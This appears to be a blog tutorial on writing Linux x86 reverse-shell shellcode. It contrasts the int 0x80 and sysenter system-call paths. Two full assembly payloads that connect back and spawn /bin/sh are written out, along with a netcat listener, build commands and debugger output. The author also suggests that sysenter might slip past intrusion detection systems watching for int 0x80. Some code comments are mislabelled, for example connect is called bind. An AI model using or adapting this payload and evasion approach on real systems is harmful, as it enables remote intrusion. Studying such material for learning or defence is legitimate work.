- Introduction
System calls are issued by user mode programs to request the kernel to perform some operation. Indeed, some resources such as hardware resources are not directly available in user mode. When an user mode program needs to open a file on the hard disk drive, it issues a system call and the kernel will be handling the opening of the file, and give back a file descriptor to the user mode program.On Unix systems, the C library provides wrapper around these system calls. In the previous example, the
open function does perform a system call.In shellcode development, it is not always the easiest way to use the libc, especially when Adress Space Layout Randomization (ASLR) is on. Hence, a shellcoder should be able to directly ask the kernel for resources through syscalls.
Current Linux Kernel provides two way to issue system call on Intel platforms:
int 0x80opcodesystenteropcode
The goal here is not to cover the famous
int 0x80 opcode details. Let's just remind that int 0x80 is implemented as a Trap Gate.In Linux terminology, Trap Gates and Interrupt Gates are entries of the Interrupt Description Table (IDT) that contain Segment Selector (SS) address and an offset inside this segment that points to interruption or exception handler. The difference between Interrupt and Trap gates is that interruptions are not masked during the execution of a Trap Gate handler.
int 0x80 is particular among other trap gate. It is part of the three implemented system gate. A system gate is a trap gate accessible by user mode programs.When an
int 0x80 is issued by user mode program, the kernel will look for the handler pointed by the 128th entry (0x80) in the IDT. This handler is the system_call() function that has all the necessary work done to move from user mode to kernel mode (register saving, security checks, etc.).Most shellcode use this methodology to access resources that are not accessible in user mode the target program is running in.
As a consequence, we can assume that the opcode
int 0x80 is checked by Intrusion Detection Systems (IDS). I wonder if an attacker can take advantage of systenter usage to escape some IDS technology.Indeed, if an IDS checks for
int 0x80 opcode, we can then defeat it using the sysenter opcode, as assembly opcodes are totally different :$ ./nasm_shell.rb nasm > int 0x80 00000000 CD80 int 0x80 nasm > sysenter 00000000 0F34 sysenterFor sure, this is just a guess, I did not dig it. In this article, we'll implement a shellcode using the
int 0x80 and modify it to use the sysenter for fun.- Int80 based shellcode
Let's write a reverse shell code that connects back to port 0x9999 (39321) on loopback device (
127.0.0.1). This code does contain some null bytes - their removal is left to the reader as homework.BITS 32
segment .text
global _start
_start:
push byte 0x66 ; sys_socketcall
pop eax
push byte 0x01
pop ebx ; socket()
cdq ; msb of eax is 0, so edx = 0
mov dl, 0x06 ; TCP ; can be 0
push edx
mov dl, 0x01 ; SOCK_STREAM
push edx
inc edx
push edx ; AF_INET
mov ecx, esp ; ptr to args
int 0x80 ; socket(AF_INET, SOCK_STREAM, TCP)
mov edi, eax ; sockfd = edi
push byte 0x66 ; sys_scocketcall
pop eax
push byte 0x03 ; connect
pop ebx
cdq
mov ecx, edx
push edx ; end of structure
push edx ; char sin_zero = 0
push 0x0100007f ; sin.sin_addr.s_addr = 127.0.0.1
push word 0x9999 ; u_short sin_port = 39321
mov dl, 0x02
push dx ; short sin_family = 0x02
mov edx, esp ; my_addr on stack
mov cl, 0x10
push ecx ; addrlen = 16
push edx ; &my_addr
push edi ; sockfd
mov ecx, esp ; ptr to args
int 0x80 ; bind(sockfd, &my_addr, addrlen);
mov ebx, edi ; sockfd = ebx
push byte 0x3f ; sys_dup2
pop eax
xor ecx, ecx
int 0x80 ; dup2(sockfd, stdin) // stdin = 0
push byte 0x3f ; sys_dup2
pop eax
inc ecx
int 0x80 ; dup2(sockfd, stdout) // stdout = 1
push byte 0x3f ; sys_dup2
pop eax
inc ecx
int 0x80 ; dup2(sockfd, stdout) // stderr = 2
cdq
push edx
push 0x68732f6e ; echo -n //bin/sh | od -t x4
push 0x69622f2f ; //bin/sh\0 on stack
mov ebx, esp ; save stack position
push edx ; NULL
push ebx ; pointer to string
; ebx points to string //bin/sh
mov ecx, esp ; pointer to array {ebx, NULL}
push byte 0xc
pop eax
dec eax
int 0x80 ; execve(ebx, ecx, edx)
push byte 0x1 ; sys_exit
pop ebx
xchg eax, ebx
dec ebx
int 0x80 ; exit(0);Netcat is used to listen for connections on port 0x9999:$ nc -lp 39321Meanwhile, in another shell, our reverse shell is compiled, linked and launched:
$ nasm -f elf reverseshell_int80.asm && ld -o reverseshell_int80 reverseshell_int80.o && ./reverseshell_int80On our first shell, we can get a "remote" shell:
$ nc -lp 39321 ls reverseshell_int80 reverseshell_int80.asm reverseshell_int80.o echo w00t w00t exit $Good ! Now let's modify this code to make usage of sysenter.
- Sysenter based shellcode - "naive" approach
A naive approach would be to change all int 0x80 opcodes by sysenter opcode:$ sed 's/int 0x80/sysenter/g' reverseshell_int80.asm > reverseshell_sysenter.asm $ nasm -f elf reverseshell_sysenter.asm && ld -o reverseshell_sysenter reverseshell_sysenter.o $ ./reverseshell_sysenter Segmentation faultAs we can see, it does not go well...
- int vs. sysenter
eip handling
Indeed,
sysenter does not perfom all the registry saving that int 0x80 does.When
int 0x80 is issued, CPU saves eflags, eip, esp, ss and cs registers. Then, it switches from user mode to kernel mode. Before eventually calling the syscall routine, the kernel saves remaining registers on the stack.On the other hand, when
sysenter opcode is issued, the CPU copies the content of three Model-Specific Registers (MSR):SYSENTER_CS_MSR, containing the systenter Code Segment address;SYSENTER_EIP_MSR, containing a pointer to thesysenter_entry()function;SYSENTER_ESP_MSR, containing the Kernel Stack pointer.
SYSENTER_CS_MSR content is copied into cs register, SYSENTER_ESP_MSR content is copied into esp and SYSENTER_EIP_MSR content is copied into eip register.The latest point is important: the current address on which
eip is pointing is not saved. If a call opcode was used, the next instruction address would have been saved. Here it is definitively not the case. Hence, shellcoder has to manually handle the eip register saving.Return from
sysenter is handled by sysexit opcode that switch from kernel mode to user mode, and by a SYSENTER_RETURN macro that pops ebp, ebx and edx registers, and ends with a ret opcode. The ret opcode pops eip from stack. As a consequence, shellcoder just needs to manully push eip on stack before issuing sysenter opcode.Other registers handling
Moreover, stack trace of
reverseshell_sysenter gives extra information:$gdb ./reverseshell_sysenter gdb$ r Program received signal SIGSEGV, Segmentation fault. --------------------------------------------------------------------------[regs] EAX: FFFFFFF2 EBX: 00000001 ECX: BFFFF504 EDX: 00000002 o d I t s z a p c ESI: 00000000 EDI: 00000000 EBP: 00000000 ESP: 00000000 EIP: B7FFF424 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0000 SS: 007B [007B:00000000]----------------------------------------------------------[stack] 00000050 : Error while running hook_stop: Cannot access memory at address 0x50 0xb7fff424 in __kernel_vsyscall () gdb$
__kernel_vsyscall code shows that ebp, ebx and ecx registers are saved on the stack, because of internal use of these registers:gdb$ disass __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xb7fff414 <__kernel_vsyscall+0>: push ecx 0xb7fff415 <__kernel_vsyscall+1>: push edx 0xb7fff416 <__kernel_vsyscall+2>: push ebp 0xb7fff417 <__kernel_vsyscall+3>: mov ebp,esp 0xb7fff419 <__kernel_vsyscall+5>: sysenter 0xb7fff41b <__kernel_vsyscall+7>: nop 0xb7fff41c <__kernel_vsyscall+8>: nop 0xb7fff41d <__kernel_vsyscall+9>: nop 0xb7fff41e <__kernel_vsyscall+10>: nop 0xb7fff41f <__kernel_vsyscall+11>: nop 0xb7fff420 <__kernel_vsyscall+12>: nop 0xb7fff421 <__kernel_vsyscall+13>: nop 0xb7fff422 <__kernel_vsyscall+14>: int 0x80 0xb7fff424 <__kernel_vsyscall+16>: pop ebp 0xb7fff425 <__kernel_vsyscall+17>: pop edx 0xb7fff426 <__kernel_vsyscall+18>: pop ecx 0xb7fff427 <__kernel_vsyscall+19>: ret End of assembler dump. gdb$Shellcoder has to manually implement this stack saving.
- Sysenter shellcode
Registers saving has to be handled manually in our shellcode, by the
_sysenter function:_sysenter: push ecx push edx push ebp mov ebp,esp sysenter
Moreover, in order to save the next instruction address on the stack, a call to
_sysenter function is inserted. Indeed, when issuing a call opcode, eip register is saved on the stack.The final code looks like this:
BITS 32
segment .text
global _start
_start:
push byte 0x66 ; sys_socketcall
pop eax
push byte 0x01
pop ebx ; socket()
cdq ; msb of eax is 0, so edx = 0
mov dl, 0x06 ; TCP ; can be 0
push edx
mov dl, 0x01 ; SOCK_STREAM
push edx
inc edx
push edx ; AF_INET
mov ecx, esp ; ptr to args
call _sysenter ; socket(AF_INET, SOCK_STREAM, TCP)
mov edi, eax ; sockfd = edi
push byte 0x66 ; sys_scocketcall
pop eax
push byte 0x03 ; connect
pop ebx
cdq
mov ecx, edx
push edx ; end of structure
push edx ; char sin_zero = 0
push 0x0100007f ; sin.sin_addr.s_addr = 127.0.0.1
push word 0x9999 ; u_short sin_port = 39321
mov dl, 0x02
push dx ; short sin_family = 0x02
mov edx, esp ; my_addr on stack
mov cl, 0x10
push ecx ; addrlen = 16
push edx ; &my_addr
push edi ; sockfd
mov ecx, esp ; ptr to args
call _sysenter ; bind(sockfd, &my_addr, addrlen);
mov ebx, edi ; sockfd = ebx
push byte 0x3f ; sys_dup2
pop eax
xor ecx, ecx
call _sysenter ; dup2(sockfd, stdin) // stdin = 0
push byte 0x3f ; sys_dup2
pop eax
inc ecx
call _sysenter ; dup2(sockfd, stdout) // stdout = 1
push byte 0x3f ; sys_dup2
pop eax
inc ecx
call _sysenter ; dup2(sockfd, stdout) // stderr = 2
cdq
push edx
push 0x68732f6e ; echo -n n/sh | od -t x4
push 0x69622f2f ; /bin//sh\0 on stack
mov ebx, esp ; save stack position
push edx ; NULL
push ebx ; pointer to string
; ebx points to string /bin/sh
mov ecx, esp ; pointer to array {ebx, NULL}
push byte 0xc
pop eax
dec eax
call _sysenter ; execve(ebx, ecx, edx)
push byte 0x1 ; sys_exit
pop ebx
xchg eax, ebx
dec ebx
call _sysenter ; exit(0);
_sysenter:
push ecx
push edx
push ebp
mov ebp,esp
sysenter
Please note that it is not exploitable "as it". call opcode introduce some bad chars and non-relocable code. This "cleaning" is left as homework for the reader.- Conclusion
I'm not sure if the sysenter opcode has really an advantage over the int 0x80. As we have seen, the shellcode grows due to the need of saving the context onto the user mode stack (general purpose registers ebp, ebx and ecx and instruction pointer eip). I'm not even sure if it is more stealthy. Please leave a comment/send email if you have data on this subject.Have phun !
Further reading: "Understanding the Linux Kernel, 3rd edition", Daniel P. Bovet & Marco Cesati, O'Reilly